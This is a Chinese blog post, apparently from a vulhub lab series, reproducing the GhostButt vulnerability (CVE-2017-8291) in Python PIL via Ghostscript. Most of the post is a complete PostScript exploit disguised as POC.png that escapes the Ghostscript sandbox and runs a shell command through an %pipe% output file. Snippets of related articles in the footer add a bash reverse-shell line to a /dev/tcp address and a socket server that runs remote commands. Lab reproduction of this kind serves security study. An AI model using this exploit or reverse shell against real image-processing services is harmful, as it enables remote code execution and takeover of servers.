Python PIL远程命令执行漏洞(GhostButt)

最新推荐文章于 2024-01-22 17:16:44 发布
最新推荐文章于 2024-01-22 17:16:44 发布
阅读量1.1k 收藏
点赞数
分类专栏: vulhub 文章标签: python 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41048303/article/details/122073970
版权

1.原理

Python中处理图片的模块PIL(Pillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞。PIL内部根据图片头来判断图片类型,如果发现是一个eps文件,则分发给PIL/EpsImagePlugin.py处理。如果操作系统上安装了GhostScript就会因为它的一个沙盒绕过漏洞,导致任意命令执行。

2.漏洞环境

docker-compose up -d

运行后,访问http://192.168.184.130:8000/

在这里插入图片描述

3.漏洞复现

正常功能是上传一个PNG文件,后端调用PIL加载图片,输出长宽。攻击者可以上传EPS文件后缀修改为PNG进行文件上传,因为后端是根据文件头来判断图片类型,所以无视后缀检查。

# POC.png
%!PS-Adobe-3.0 EPSF-3.0
%%BoundingBox: -0 -0 100 100


/size_from  10000      def
/size_step    500      def
/size_to   65000      def
/enlarge    1000      def

%/bigarr 65000 array def

0
size_from size_step size_to {
    pop
    1 add
} for

/buffercount exch def

/buffersizes buffercount array def


0
size_from size_step size_to {
    buffersizes exch 2 index exch put
    1 add
} for
pop

/buffers buffercount array def

0 1 buffercount 1 sub {
    /ind exch def
    buffersizes ind get /cursize exch def
    cursize string /curbuf exch def
    buffers ind curbuf put
    cursize 16 sub 1 cursize 1 sub {
        curbuf exch 255 put
    } for
} for


/buffersearchvars [0 0 0 0 0] def
/sdevice [0] def

enlarge array aload

{
    .eqproc
    buffersearchvars 0 buffersearchvars 0 get 1 add put
    buffersearchvars 1 0 put
    buffersearchvars 2 0 put
    buffercount {
        buffers buffersearchvars 1 get get
        buffersizes buffersearchvars 1 get get
        16 sub get
        254 le {
            buffersearchvars 2 1 put
            buffersearchvars 3 buffers buffersearchvars 1 get get put
            buffersearchvars 4 buffersizes buffersearchvars 1 get get 16 sub put
        } if
        buffersearchvars 1 buffersearchvars 1 get 1 add put
    } repeat

    buffersearchvars 2 get 1 ge {
        exit
    } if
    %(.) print
} loop

.eqproc
.eqproc
.eqproc
sdevice 0
currentdevice
buffersearchvars 3 get buffersearchvars 4 get 16#7e put
buffersearchvars 3 get buffersearchvars 4 get 1 add 16#12 put
buffersearchvars 3 get buffersearchvars 4 get 5 add 16#ff put
put


buffersearchvars 0 get array aload

sdevice 0 get
16#3e8 0 put

sdevice 0 get
16#3b0 0 put

sdevice 0 get
16#3f0 0 put


currentdevice null false mark /OutputFile (%pipe%touch /tmp/aaaaa)
.putdeviceparams
1 true .outputpage
.rsdparams
%{ } loop
0 0 .quit
%asdf

上传后查看创建的文件
在这里插入图片描述

小白头发少
关注
专栏目录
python——PIL常见用法
weixin_42636075的博客
05-30 1962
代码python——PIL常见用法。
Python PIL 远程命令执行漏洞GhostButt
EC_Carrot的博客
07-21 373
漏洞简介 Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞漏洞复现 运行后,访问http://your-ip:8000/即可看到一个上传页面。正常功能是上传一个PNG文件,后端调用PIL加载图片,输出长宽。但我们可以将可执行命令EPS文件后缀改成PNG进行上传,因为后端是根据文件头来判断图片类型,所以无视后缀检查。 我们用poc.png来上传,即可执行touch /tmp/aa
Python PIL 远程命令执行漏洞GhostButt CVE-2017-8291 )
qq_54713392的博客
05-14 1014
Python PIL 远程命令执行漏洞GhostButt CVE-2017-8291 ) 漏洞原理:Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞 攻击机:window 10 192.168.32.1 靶机:ubantu 16.04 192.168.32.142 (1)在ubantu中开启docker环境CVE-2017-8291 执行命令:docker-compose up
Python-PIL-远程命令执行GhostButt-)(CVE-2017-8291)
bqnagus
10-02 742
Python-PIL-远程命令执行GhostButt-)(CVE-2017-8291)
python 代码审计-命令执行漏洞(自己编写的代码
weixin_33904756的博客
09-10 419
python 代码审计-命令执行漏洞(自己编写的代码) 0x00 源代码 def execute(request): context ={} ip= request.POST.get("ip") username= request.POST.get("username") password= request.POST.get("password") idn...
Python 简单的远程执行命令
weixin_30763397的博客
07-01 220
client端执行命令,server端返回命令结果 # server 端 import socket, subprocess sk = socket.socket() address=('127.0.0.1', 8000) sk.bind(address) sk.listen(3) print('waiting....') while 1: conn, addr = sk.accept...
Python 紧急修复远程代码执行漏洞
smellycat000的专栏
02-23 555
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队Python 软件基金会 (PSF) 紧急推出 Python 3.9.2 和 3.8.8 稳定版,解决两个严重的安全缺陷,其中...
RCE(远程命令代码执行漏洞
weixin_42393944的博客
08-10 555
1.理解:可以直接让攻击者向后台服务器远程注入操作命令或者代码,从而控制后台系统 2.区别: 远程命令执行:直接调用操作系统命令 远程代码执行:靠执行代码调用操作系统命令 3.windows系统命令拼接 <1>"|":管道符,前面命令标准输出,后面命令标准输入 <2>"&": A&B,先运行A后运行B <3>"||": A||B ,运行A命令,若A失败则运行B命令 <4&gt...
vulhub漏洞复现55_python
weixin_44193247的博客
02-11 766
vulhub漏洞复现练习篇
python pil reference
01-07
python pil 图片组件官方reference. 手工将reference里面的每一项内容复制到本地,最终输出成pdf.避免每次都去访问官网去查看SDK。 后续准备根据reference翻译成中文一份,和大家共勉。
Python PIL图片添加字体的例子
09-18
PIL库(Python Imaging Library,现在称为Pillow)就是一个专门用于图像处理的库,它提供了强大的图片处理能力。 在这篇分享的实例中,我们将学习如何使用PythonPIL库(Pillow)在图片上添加文字。这是一个非常...
Python PIL远程命令执行漏洞复现(CVE-2017-8291 CVE-2017-8291)
didiplus
08-03 2691
漏洞原理 Python中处理图片的模块PILPillow),因为其内部调用了GhostScript而受到GhostButt漏洞(CVE-2017-8291)的影响,造成远程命令执行漏洞漏洞详情 漏洞简述 PIL内部根据图片头(Magic Bytes)判断图片类型,如果发现是一个eps文件(头为%!PS),则分发给PIL/EpsImagePlugin.py处理。 在这个模块中,PIL调用了系统的gs命令,也就是GhostScript来处理图片文件: command = ["gs",
入侵防御漏洞复现(四)
最新发布
szdx1043的博客
01-22 1000
ISC BIND是美国Internet Systems Consortium(ISC)公司所维护的一套实现了DNS协议的开源软件。ISC BIND 9.9.7-P1及之前版本和9.10.2-P2及之前版本的named中存在安全漏洞远程攻击者可借助TKEY查询利用该漏洞造成拒绝服务(REQUIRE断言失败和守护进程退出)。
FBI 网站被黑,泄露数据已在 Pastebin 公布
weixin_34337265的博客
06-06 383
著名黑客CyberZeist最近入侵了FBI网站(FBI.gov),并将几个备份文件(acc_102016.bck,acc_112016.bck,old_acc16.bck等)公布在了Pastebin,数据内容包括姓名、SHA1加密密码、SHA1盐和电子邮件等。 CyberZeist这名黑客颇有名气,他曾是Anonymous的一员,2011年有过黑入FB...
远程命令执行漏洞远程代码执行漏洞33333
zkq001002的博客
10-05 9200
远程命令执行漏洞的原理 远程命令执行漏洞,用户通过浏览器提交执行命令,由于服务器端 没有针对执行函数做 过滤,导致在没有指定绝对路径的情况下就执行命令 复现示例 Tomcat任意文件上传漏洞CVE-2017-12615 介绍 ApacheTomcat服务组件中开启了http的Put方法所造成的攻击者可以利用该方法任意 上传jsp木马所造成的远程代码执行漏洞。 知默认情况下是禁止http请求...
s2-012远程代码执行漏洞
Stephen Wolf
11-18 928
一、漏洞描述: 如果在配置 Action 中 Result 时使用了重定向类型,并且还使用 ${param_name} 作为重定向变量 xml <package name="S2-012" extends="struts-default"> <action name="user" class="com.demo.action.UserAction"> ...
ImageMagick漏洞汇总
Au
04-05 4577
ImageMagick 一款使用量很广的图片处理程序,许多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等功能 本文就简单的做个汇总,细节就概述了 CVE-2016-3714— RCE ImageMagick流行的原因之一,就是它功能强大,可以处理很多情况,而有一个功能delegate,作用是调用外部的lib来处理文件。调用外部lib就是执行system命令,...
APT组织Lazarus近期攻击变化阐述
blackorbird的博客
07-08 612
Lazarus是来自朝鲜的APT组织,该组织长期对韩国、美国进行渗透攻击,此外还对全球的金融机构进行攻击,堪称全球金融机构的最大威胁。下面为近半年该组织的一些最新动态以及...
PIL-CVE-2017-8291
qq_48703517的博客
05-06 1075
打开靶场 192.168.71.141:8000打开 讲poc.png上传 以 docker exec –it 7dd /bin/bash 进入容器在tmp下找到poc.png 反弹shell bash –c “bash –i >& /dev/tcp/192.168.71.131/8888 0>&1” Kali启动监听 成功 ...
Python PIL 图像处理手册
"Python PIL Handbook 是一本关于Python Imaging Library (PIL)的手册,它提供了易用且易于上手的图像处理功能。手册涵盖了PIL 1.1.3版本,由Fredrik Lundh和Matthew Ellis编写,发布于2002年3月12日。" Python ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值